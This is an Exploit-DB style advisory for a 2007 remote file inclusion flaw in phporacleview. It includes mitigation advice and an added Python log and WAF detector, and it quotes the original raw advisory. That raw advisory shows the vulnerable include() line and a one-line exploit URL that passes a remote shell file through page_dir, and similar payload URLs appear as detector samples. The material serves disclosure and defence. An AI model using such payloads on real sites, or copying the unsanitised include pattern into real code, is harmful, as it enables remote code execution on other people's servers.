Vendor: phporacleview
By: Alkomandoz Hacker
CVSS: 5.5 (MEDIUM)
CWE: Remote File Inclusion
Product Name: phporacleview
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phporacleview Remote File Inclusion Exploit

The phporacleview script inc/include_all.inc.php builds an include() path from the 'page_dir' parameter. By manipulating 'page_dir' in the URL, an attacker can make the script include a malicious file hosted on a remote server.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion functions. Additionally, consider using a web application firewall to detect and block malicious requests.
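
Added example (not part of the original advisory or the phporacleview project): a Python check of the kind a log pipeline or WAF rule could apply, flagging requests to inc/include_all.inc.php whose page_dir value begins with a URL scheme or stream wrapper, including repeatedly percent-encoded forms. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and parameter name come from the advisory; the log format is assumed.
TARGET_SUFFIX = "/inc/include_all.inc.php"
PARAM = "page_dir"
# URL schemes, data: URIs and UNC/protocol-relative prefixes are never a valid directory prefix.
WRAPPER = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|\\\\|//)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # combined-log request line

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) up to `rounds` times."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def suspicious_params(request_target):
    """Return [(param, decoded_value)] for remote-inclusion style values, else []."""
    parts = urlsplit(request_target)
    if not fully_decode(parts.path).lower().endswith(TARGET_SUFFIX):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        base = name.split("[", 1)[0].lower()   # page_dir[] counts as page_dir
        value = fully_decode(value)
        if base == PARAM and WRAPPER.match(value):
            hits.append((base, value))
    return hits

def scan(log_lines):
    """Yield (line_number, hits) for each log line that trips the check."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Apr/2007:10:00:00 +0000] "GET /phporacleview/index.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [26/Apr/2007:10:00:05 +0000] "GET /phporacleview/inc/include_all.inc.php?page_dir=http://files.example/x.txt? HTTP/1.1" 200 90',
    '192.0.2.44 - - [26/Apr/2007:10:00:09 +0000] "GET /phporacleview/inc/include_all.inc.php?page_dir=%2568ttp%253A%252F%252Ffiles.example%252Fx HTTP/1.1" 200 90',
    '192.0.2.10 - - [26/Apr/2007:10:01:00 +0000] "GET /phporacleview/inc/include_all.inc.php?page_dir=../ HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```

Values sent in a POST body or cookie do not appear in access logs, so the same check also belongs at the WAF or application layer.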

Exploit-DB raw data:

===============================
phporacleview =>  (page_dir) Remote File Inclusion Exploit
===============================

Discovered By : Alkomandoz Hacker


Homepage= Asb-May.Net & Mohandko.com & Sniper-sa.com & Tryag.com

================================

Script Name: phporacleview

Download Script: http://webxadmin.free.fr/download/phporacleview.zip


=================================
Bug in :

phporacleview/inc/include_all.inc.php

=======

<?
include($page_dir . $inc_dir . "config.inc.php");

==================================


Exploit :
--------------------------------

http://localhost/phporacleview/inc/include_all.inc.php?page_dir=http://Shell.txt?

===================================

GreetZ : AsbMay's Groups & City Of Ghosts Team & Sniper-sa TeAm

# milw0rm.com [2007-04-26]